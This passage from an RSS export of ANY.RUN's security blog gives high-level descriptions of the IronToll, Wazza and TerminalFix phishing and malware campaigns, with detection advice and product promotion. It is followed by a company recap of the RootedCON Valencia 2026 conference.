<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/205d78f7-4e84-4210-a0fc-8b1a4044b4d2/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check full attack chain</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="657" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-1024x657.jpeg" alt="IronToll Steals Card Data and OTPs Across 12+ Countries" class="wp-image-23460" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-1024x657.jpeg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-300x193.jpeg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-768x493.jpeg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-1536x986.jpeg 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-2048x1314.jpeg 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-370x237.jpeg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-270x173.jpeg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/IronToll-740x475.jpeg 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>A fake payment step exposed inside ANY.RUN sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The platform impersonates government, postal, courier, tax, banking, and transport services across <strong>12+ countries</strong>, including USPS in the US, and uses cloned pages to steal payment-card data and OTPs in real time. A WebSocket-based operator panel gives attackers live visibility into victim sessions and lets them request additional card details or one-time passwords. </p>



<p class="wp-block-paragraph">For a deeper technical breakdown of IronToll’s infrastructure, backend paths, campaign generations, and hunting indicators, see our <a href="https://intelligence.any.run/reports/09-10-2026-irontoll" target="_blank" rel="noreferrer noopener">Premium TI Report</a>, available to Premium Threat Intelligence users. </p>



<p class="wp-block-paragraph"><strong>Fraud risk to reduce:</strong> IronToll shows why real-time phishing requires fast detection and response. Live operator involvement can turn stolen card data and OTPs into an immediate payment-fraud opportunity, while disposable domains can rotate quickly. Security teams should combine domain blocking with detection of recurring backend paths and other patterns that persist as infrastructure changes. </p>



<h2 class="wp-block-heading">Wazza Uses Multi-Stage Routing to Evade Automated Detection</h2>



<p class="wp-block-paragraph">Wazza is a phishing kit targeting banking, manufacturing, and government organizations, with observed activity in the US, Europe, and Australia. Victims first pass through campaign routing and anti-bot filters before reaching an Adobe Document Cloud-themed Device Code phishing page. The flow uses campaign validation, client markers, short-lived session tokens, browser telemetry checks, and multiple redirects to keep the final phishing page hidden until the visitor passes the required checks.</p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/be1f83a0-742a-42de-afe4-c20110ef667f/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check sandbox session</a></p>



<p class="wp-block-paragraph"><a href="https://x.com/anyrun_app/status/2102745165915996562" target="_blank" rel="noreferrer noopener">Check details and gather IOCs</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="819" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-819x1024.png" alt="Wazza phishing kit details" class="wp-image-23474" style="width:579px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-819x1024.png 819w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-240x300.png 240w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-768x960.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-1229x1536.png 1229w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-1638x2048.png 1638w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-370x463.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-270x338.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-740x925.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Wazza-scaled.png 2048w" sizes="auto, (max-width: 819px) 100vw, 819px" /><figcaption class="wp-element-caption"><em>Wazza phishing kit details</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>Detection risk to reduce:</strong> Wazza is designed to make automated detection less reliable by hiding the final phishing destination behind filtering and staged redirects. Security teams should analyze the full browser flow, not just the first URL, to uncover the final authentication page and confirm malicious activity earlier.</p>



<h2 class="wp-block-heading">TerminalFix Targets US and Canadian Users with Multi-Stage Delivery and Evasive Payload Execution </h2>



<p class="wp-block-paragraph">TerminalFix is a multi-stage campaign targeting users in the US and Canada through compromised WordPress sites. The attack chain uses several techniques to make malicious activity harder to recognize, including JavaScript that represents binary payloads as sequences of ordinary English words and a legitimate Node.js runtime to decode them.  </p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/00d12fa2-c9da-44fc-848f-7481a520762a/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View sandbox session</a> </p>



<p class="wp-block-paragraph"><a href="https://x.com/anyrun_app/status/2097679034033324161" target="_blank" rel="noreferrer noopener">Check details and gather IOCs</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="819" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-819x1024.png" alt="Full TerminalFix attack chain" class="wp-image-23461" style="width:587px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-819x1024.png 819w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-240x300.png 240w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-768x960.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-1229x1536.png 1229w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-1638x2048.png 1638w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-370x463.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-270x338.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-740x925.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Full-TerminalFix-attack-chain-scaled.png 2048w" sizes="auto, (max-width: 819px) 100vw, 819px" /><figcaption class="wp-element-caption"><em>Full TerminalFix attack chain</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Later stages execute through a signed Microsoft binary, while the campaign also uses a Polygon smart contract to retrieve lure infrastructure and a public forum profile to obtain its final C2 list. </p>



<p class="wp-block-paragraph"><strong>Detection risk to reduce:</strong> TerminalFix shows how malicious activity can be spread across trusted processes, legitimate services, and several execution stages instead of appearing as one clearly malicious file. Security teams should correlate browser activity, script execution, unusual child processes, and outbound connections to catch the full chain before the attacker reaches later-stage C2 communication.</p>



<h2 class="wp-block-heading">Close Detection Gaps Exposed by September’s Attacks </h2>



<p class="wp-block-paragraph">September’s attacks showed that the hardest part is often not spotting something suspicious, but understanding what it means quickly enough to act. CSuite crossed identity and endpoint access, N0va abused legitimate authentication flows, Wazza used routing and anti-bot checks to evade automated detection, TerminalFix hid malicious execution behind trusted components, and IronToll kept changing infrastructure while reusing recognizable backend patterns.</p>



<p class="wp-block-paragraph">For security leaders, that puts more pressure on investigation speed and context. Analysts need to move from alert to evidence, then from evidence to campaign-level understanding, without spending too much time rebuilding the same picture manually. </p>



<h3 class="wp-block-heading">1. See What the Alert Does Next </h3>



<p class="wp-block-paragraph">Many of these attacks only become clearly malicious after the first interaction. A document lure, login request, signed process, or remote-management tool may look legitimate on its own. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="552" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-1024x552.png" alt="Fake verification code displayed inside ANY.RUN sandbox" class="wp-image-23462" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-1024x552.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-300x162.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-768x414.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-1536x829.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-2048x1105.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-370x200.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/september-attacks-740x399.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake verification code displayed inside ANY.RUN sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> lets analysts observe the full behavior behind suspicious files and URLs, including redirects, scripts, process execution, payload delivery, network activity, and other actions that appear later in the chain. </p>



<p class="wp-block-paragraph">That visibility helps teams validate incidents faster and make containment decisions with less manual investigation. Organizations using ANY.RUN have reported <strong>94% faster threat triage</strong> and a <strong>21-minute reduction in MTTR</strong>. </p>



<h3 class="wp-block-heading">2. Turn One Indicator into Wider Threat Context </h3>



<p class="wp-block-paragraph">September’s campaigns showed how easily a single IOC can hide a much larger operation. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> helps analysts pivot from domains, IPs, URLs, files, and sandbox findings to related infrastructure, previous activity, and connected threats. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="622" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png-1024x622.webp" alt="ANY.RUN’s Threat Intelligence gives full context into CSuite suspicious activity" class="wp-image-23463" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png-1024x622.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png-300x182.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png-768x466.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png-1536x933.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png-370x225.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png-270x164.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png-740x449.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png.webp 1744w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s Threat Intelligence gives full context into CSuite suspicious activity</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">This gives teams more context before they escalate or contain a case, helping reduce time spent on manual enrichment and repeated lookups. In practice, that can mean <strong>30% fewer Tier 1-to-Tier 2 escalations</strong>, giving senior analysts more time to focus on the cases that truly need deeper investigation. </p>



<h3 class="wp-block-heading">3. Bring Confirmed Threat Data Back into Detection </h3>



<p class="wp-block-paragraph">Once malicious activity is confirmed that context should reach the rest of the security stack quickly. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> deliver fresh malicious IPs, domains, URLs, and other IOCs into SIEM, SOAR, TIP, firewalls, and other security tools. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="462" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-1024x462.png" alt="SOC teams implement TI Feeds for fresh and actionable IOCs into their existing stack" class="wp-image-23271" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-1024x462.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-300x135.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-768x346.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-1536x692.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-2048x923.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-370x167.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-270x122.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-740x334.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>SOC teams implement TI Feeds for fresh and actionable IOCs into their existing stack</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The feeds are backed by real-world analysis from a global community of <strong>700,000+ security professionals across 16,000+ organizations</strong>, helping teams keep detection coverage current as campaigns rotate infrastructure and change delivery methods. </p>



<p class="wp-block-paragraph">That reduces manual IOC collection, broadens visibility into active threats, and helps security controls react faster to newly observed malicious infrastructure. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Turn faster investigations into faster containment.
</span> 
<br>
Reduce workload and strengthen response across entire SOC.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-september-2026&#038;utm_term=290926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Your SOC Response</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> provides interactive malware analysis and threat intelligence solutions for SOC teams, threat hunters, incident responders, and enterprise security teams. </p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> helps analysts safely investigate suspicious files, URLs, phishing pages, and malware while observing the full attack chain in real time. Teams can inspect browser activity, processes, network traffic, persistence, credential access, and other behavior to validate threats faster and make better-informed response decisions. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> turns data from real-world sandbox investigations into context for detection, threat hunting, and incident response. Analysts can connect individual indicators to related infrastructure and wider campaigns, while <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> bring newly observed threat data into existing security controls. </p>
<p>The post <a href="https://any.run/cybersecurity-blog/major-cyber-attacks-september-2026/">Major Cyber Attacks in September 2026: US and EU Face Session Theft, Remote Access, and Payment Fraud</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/major-cyber-attacks-september-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ANY.RUN at RootedCON Valencia 2026: Where Cybersecurity Meets the Next Wave of AI</title>
		<link>https://any.run/cybersecurity-blog/rootedcon-valencia-2026/</link>
					<comments>https://any.run/cybersecurity-blog/rootedcon-valencia-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Fri, 25 Sep 2026 12:14:31 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23409</guid>

					<description><![CDATA[<p>ANY.RUN once again joined the RootedCON community this year, taking part in Rooted Valencia 2026 on September 18. The event brought together cybersecurity professionals, researchers, hackers, and technology enthusiasts from across the global cybersecurity community. For our team, the event became yet another opportunity to meet security professionals, speak with clients, and demonstrate how interactive [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/rootedcon-valencia-2026/">ANY.RUN at RootedCON Valencia 2026: Where Cybersecurity Meets the Next Wave of AI</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> once again joined the <a href="https://rootedcon.com/" target="_blank" rel="noreferrer noopener">RootedCON</a> community this year, taking part in Rooted Valencia 2026 on September 18. The event brought together cybersecurity professionals, researchers, hackers, and technology enthusiasts from across the global cybersecurity community. </p>



<p class="wp-block-paragraph">For our team, the event became yet another opportunity to meet security professionals, speak with clients, and demonstrate how interactive sandboxing and threat intelligence can support <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">SOCs</a> and <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSPs</a> at any scale. We also shared some of the latest capabilities designed to help analysts investigate incidents faster and get more context from their findings. </p>



<h2 class="wp-block-heading">Rooted Valencia Agenda 2026 </h2>



<p class="wp-block-paragraph">The Valencia edition of RootedCON covered a wide range of topics, from AI agents and prompt injection to cloud security, command-and-control, and malware research. </p>



<p class="wp-block-paragraph">Several sessions explored how emerging technologies are changing the attack surface, while others focused on established techniques used in modern attacks. AI was particularly prominent, with discussions around rogue agents, small language models, and authentication for AI agents. </p>



<h2 class="wp-block-heading">Connecting with Security Teams </h2>



<p class="wp-block-paragraph">RootedCON gave us the chance to learn more about how security teams are integrating ANY.RUN into their existing workflows. We learned more about how our users apply <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">interactive sandboxing</a> during investigations and implement <a href="https://intelligence.any.run/?utm_source=mtt&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktothreatintelligence" target="_blank" rel="noreferrer noopener">threat intelligence</a> to connect findings, uncover related activity, and add context to their cases. </p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper">
<blockquote class="twitter-tweet" data-width="550" data-dnt="true"><p lang="en" dir="ltr"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f91d.png" alt="🤝" class="wp-smiley" style="height: 1em; max-height: 1em;" /> We’re at <a href="https://x.com/rootedcon?ref_src=twsrc%5Etfw">@rootedcon</a> Valencia 2026!<br><br>Come say hi to the <a href="https://x.com/hashtag/ANYRUN?src=hash&amp;ref_src=twsrc%5Etfw">#ANYRUN</a> team and talk about the real work behind SOC &amp; MSSP growth <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f4aa.png" alt="💪" class="wp-smiley" style="height: 1em; max-height: 1em;" /><a href="https://x.com/hashtag/RootedVLC?src=hash&amp;ref_src=twsrc%5Etfw">#RootedVLC</a> <a href="https://t.co/rBuadTXbGo">pic.twitter.com/rBuadTXbGo</a></p>&mdash; ANY.RUN (@anyrun_app) <a href="https://x.com/anyrun_app/status/2100900454800437338?ref_src=twsrc%5Etfw">September 18, 2026</a></blockquote><script async src="https://platform.x.com/widgets.js" charset="utf-8"></script>
</div></figure>



<p class="wp-block-paragraph">These conversations offered valuable insight into the different ways <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">SOCs</a> and <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSPs</a> work with our solutions and the challenges they encounter in their day-to-day operations.  </p>



<h2 class="wp-block-heading">Taking a Closer Look at ANY.RUN’s Capabilities </h2>



<p class="wp-block-paragraph">At the ANY.RUN booth, we demonstrated how interactive analysis can help security teams move beyond an initial alert and understand what a suspicious object actually does. </p>



<p class="wp-block-paragraph">With the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, analysts can execute files and URLs in controlled environments, observe their behavior in real time, and examine processes, network connections, files, commands, and other activity generated during execution. This visibility helps triage alerts faster, improve detection accuracy, reduce unnecessary escalations, and respond to confirmed threats more quickly. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="579" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/4-1024x579.png" alt="" class="wp-image-23416" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/4-1024x579.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/4-300x170.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/4-768x434.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/4-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/4-270x153.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/4-740x418.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/4.png 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Demonstrating the capabilities of ANY.RUN’s Interactive Sandbox</em></figcaption></figure>



<p class="wp-block-paragraph"><a href="https://any.run/use-case/phishing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktophishing" target="_blank" rel="noreferrer noopener">Phishing</a> alerts are another common use case for this approach. Suspicious links and attachments can be analyzed in a controlled environment to reveal redirects, downloaded payloads, network connections, and other activity that may not be apparent from the original message alone. This can give analysts more context when assessing potentially malicious emails and deciding how to respond. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="579" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/1-1024x579.png" alt="" class="wp-image-23419" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/1-1024x579.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/1-300x170.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/1-768x434.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/1-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/1-270x153.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/1-740x418.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/1.png 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing analysis was one of the key topics at Rooted Valencia 2026</em></figcaption></figure>



<p class="wp-block-paragraph">The information uncovered during analysis can also become the starting point for a wider investigation. Indicators discovered during a session can be used to search for related samples, domains, IP addresses, and other artifacts through ANY.RUN&#8217;s <a href="https://intelligence.any.run/?utm_source=mtt&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktothreatintelligence" target="_blank" rel="noreferrer noopener">threat intelligence</a> capabilities. This allows analysts to speed up investigations, uncover connections between related threats, and reduce the manual work involved in tracing attack infrastructure. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut MTTR by 21 minutes per case</span> <br> with faster, behavior-based threat investigations.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=rootedcon-valencia-2026&#038;utm_term=250926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Explore for Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">For security teams, combining behavioral analysis with threat intelligence can help connect individual phishing alerts to the broader activity behind them, rather than treating each case as an isolated event. </p>



<h2 class="wp-block-heading">What We Heard from Security Teams at RootedCON Valencia </h2>



<p class="wp-block-paragraph">Many of our conversations at RootedCON Valencia 2026 came back to a familiar challenge: security teams need to investigate more activity without adding unnecessary manual work. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="579" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/6-1024x579.png" alt="" class="wp-image-23420" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/6-1024x579.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/6-300x170.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/6-768x434.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/6-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/6-270x153.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/6-740x418.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/6.png 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Discussions at the ANY.RUN booth during RootedCON Valencia 2026</em></figcaption></figure>



<p class="wp-block-paragraph">Whether the case involves a phishing attachment, suspicious URL, or unfamiliar malware sample, analysts need enough context to understand what happened and decide what to investigate next. </p>



